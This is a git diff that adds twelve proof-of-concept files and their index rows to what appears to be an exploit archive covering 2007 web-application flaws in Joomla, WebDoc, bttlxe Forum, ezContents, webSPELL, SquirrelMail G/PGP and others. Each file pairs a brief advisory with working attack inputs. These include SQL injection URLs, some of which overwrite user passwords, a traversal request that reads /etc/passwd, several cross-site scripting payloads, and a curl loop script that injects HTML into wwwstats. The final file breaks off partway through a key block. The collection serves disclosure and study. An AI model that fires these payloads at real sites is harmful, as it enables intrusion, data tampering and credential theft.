diff --git a/files.csv b/files.csv
index 7029c4f2b..482f83658 100755
--- a/files.csv
+++ b/files.csv
@@ -27681,3 +27681,18 @@ id,file,description,date,author,platform,type,port
30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 getpath.aspx Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0
30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 chat/deluser.php3 LIMIT Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
+30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
+30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
+30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0
+30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0
+30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0
+30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 Clickstats.PHP Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0
+30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 Multiple SQL Injection Vulnerabilities",2007-12-07,Chrysalid,asp,webapps,0
+30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 usergallery.php galleryID Parameter XSS",2007-12-10,Brainhead,php,webapps,0
+30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 calendar.php Multiple Parameter XSS",2007-12-10,Brainhead,php,webapps,0
+30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 Access Validation And Input Validation Vulnerabilities",2007-12-10,"Tomas Kuliavas",php,webapps,0
+30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0
+30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
diff --git a/platforms/asp/webapps/30855.txt b/platforms/asp/webapps/30855.txt
new file mode 100755
index 000000000..2c6cbf954
--- /dev/null
+++ b/platforms/asp/webapps/30855.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26761/info
+
+WebDoc is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WebDoc 3.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/categories.asp?document_id=37&cat_id=convert(int,(select+@@version));--
\ No newline at end of file
diff --git a/platforms/asp/webapps/30860.txt b/platforms/asp/webapps/30860.txt
new file mode 100755
index 000000000..8cee405ca
--- /dev/null
+++ b/platforms/asp/webapps/30860.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26790/info
+
+bttlxe Forum is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect bttlxe Forum 2.0; other versions may also be affected.
+
+http://www.example.com/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--
+http://www.example.com/myaccount/viewProfile.asp?member='update Members set Password='hacked';--
+http://www.example.com/myaccount/failure.asp?err_txt=">
\ No newline at end of file
diff --git a/platforms/php/webapps/30848.txt b/platforms/php/webapps/30848.txt
new file mode 100755
index 000000000..92a182c07
--- /dev/null
+++ b/platforms/php/webapps/30848.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26707/info
+
+Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Joomla! 1.5 RC3 is vulnerable; other versions may also be affected.
+
+UPDATE (December 10, 2007): The validity of the issues is being disputed on the Joomla! Bug Tracker. Please see the references for details. Reports indicate that the related message was posted by a Joomla! developer, but this has not been confirmed.
+
+http://www.example.com/index.php?option=com_content&view=somechars'%20+%20'article&id=25&Itemid=28
\ No newline at end of file
diff --git a/platforms/php/webapps/30849.txt b/platforms/php/webapps/30849.txt
new file mode 100755
index 000000000..54833ef63
--- /dev/null
+++ b/platforms/php/webapps/30849.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/26707/info
+
+Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Joomla! 1.5 RC3 is vulnerable; other versions may also be affected.
+
+UPDATE (December 10, 2007): The validity of the issues is being disputed on the Joomla! Bug Tracker. Please see the references for details. Reports indicate that the related message was posted by a Joomla! developer, but this has not been confirmed.
+
+http://www.example.com/index.php?searchword=&task=somechars%27+%2B+%27search&option=com_search
+http://www.example.com/index.php?searchword=&task=search&option=somechars%27+%2B+%27com_search
\ No newline at end of file
diff --git a/platforms/php/webapps/30851.txt b/platforms/php/webapps/30851.txt
new file mode 100755
index 000000000..ccf7e32c2
--- /dev/null
+++ b/platforms/php/webapps/30851.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26737/info
+
+VisualShapers ezContents is prone to a vulnerability that allows remote attackers to display the contents of arbitrary local files in the context of the webserver process.
+
+An attacker can exploit this issue to retrieve potentially sensitive information that may aid in further attacks.
+
+This issue affects ezContents 1.4.5; other versions may also be vulnerable.
+
+http://www.example.com/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
\ No newline at end of file
diff --git a/platforms/php/webapps/30852.txt b/platforms/php/webapps/30852.txt
new file mode 100755
index 000000000..1b087c309
--- /dev/null
+++ b/platforms/php/webapps/30852.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26744/info
+
+SupportSuite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+SupportSuite 3.00.32 is affected by this issue; other versions may also be vulnerable.
+
+http://www.example.com/SupportSuite/upload/includes/LoginShare/modernbill.login.php/%3Cscript%3Ealert(1)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/30853.txt b/platforms/php/webapps/30853.txt
new file mode 100755
index 000000000..bf15e6132
--- /dev/null
+++ b/platforms/php/webapps/30853.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26745/info
+
+OpenNewsletter is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+OpenNewsletter 2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/to/opennewsletter/compose.php?type=html'%3Ch1%3EXSS!%3C/h1%3E http://www.example.com/path/to/opennewsletter/compose.php?type=';%3CSCRIPT%3Ealert(String.fromCharCode(88,%2083,%2083,%2032,%2058,%2040))//\';%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/30854.sh b/platforms/php/webapps/30854.sh
new file mode 100755
index 000000000..3105a6401
--- /dev/null
+++ b/platforms/php/webapps/30854.sh
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/26759/info
+
+The 'wwwstats' program is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
+
+Versions prior to wwwstats 3.22 are vulnerable.
+
+#!/bin/sh
+#jolmos (at) isecauditors (dot) com
+
+if [ $# -ne 4 ]
+then
+ echo "Usage: $0
+ "
+ echo "Example: $0 http://www.example.com/wwwstats
+ 100"
+ exit
+fi
+
+echo 'Attacking, wait a moment'
+for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done
\ No newline at end of file
diff --git a/platforms/php/webapps/30857.txt b/platforms/php/webapps/30857.txt
new file mode 100755
index 000000000..6dfbc896d
--- /dev/null
+++ b/platforms/php/webapps/30857.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26787/info
+
+webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+webSPELL 4.01.02 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
\ No newline at end of file
diff --git a/platforms/php/webapps/30858.txt b/platforms/php/webapps/30858.txt
new file mode 100755
index 000000000..318be0484
--- /dev/null
+++ b/platforms/php/webapps/30858.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/26787/info
+
+webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+webSPELL 4.01.02 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
+http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
\ No newline at end of file
diff --git a/platforms/php/webapps/30859.txt b/platforms/php/webapps/30859.txt
new file mode 100755
index 000000000..faaa6a129
--- /dev/null
+++ b/platforms/php/webapps/30859.txt
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/26788/info
+
+The G/PGP encryption plugin for SquirrelMail is prone to an input-validation vulnerability and an access-validation vulnerability.
+
+Attackers can exploit these issues to inject arbitrary script code into public key data or to delete and overwrite arbitrary files with the privileges of the application.
+
+SquirrelMail G/PGP Encryption Plugin 2.0, 2.0.1, and 2.1 are vulnerable; other versions may also be affected.
+
+NOTE: One or more of these issues may already have been documented in the following BIDs, but we don't have enough information at this time to distinguish among them:
+
+- 24782, SquirrelMail G/PGP Encryption Plug-in Unspecified Remote Command Execution Vulnerability
+- 24828, SquirrelMail G/PGP Encryption Plug-in Multiple Unspecified Remote Command Execution Vulnerabilities
+- 24874, SquirrelMail G/PGP Encryption Plug-in Multiple Remote Command Execution
+Vulnerabilities
+
+Message-ID: <50453.10.0.0.1.1192345884.squirrel@mail.example.org>
+Date: Sun, 14 Oct 2007 10:11:24 +0300 (EEST)
+Subject: Test mail with SquirrelMail GPG 2.1 POC exploit
+From: test@example.org
+
+Test mail with SquirrelMail GPG 2.1 JavaScript exploit
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.4.6 (GNU/Linux)
+
+">
+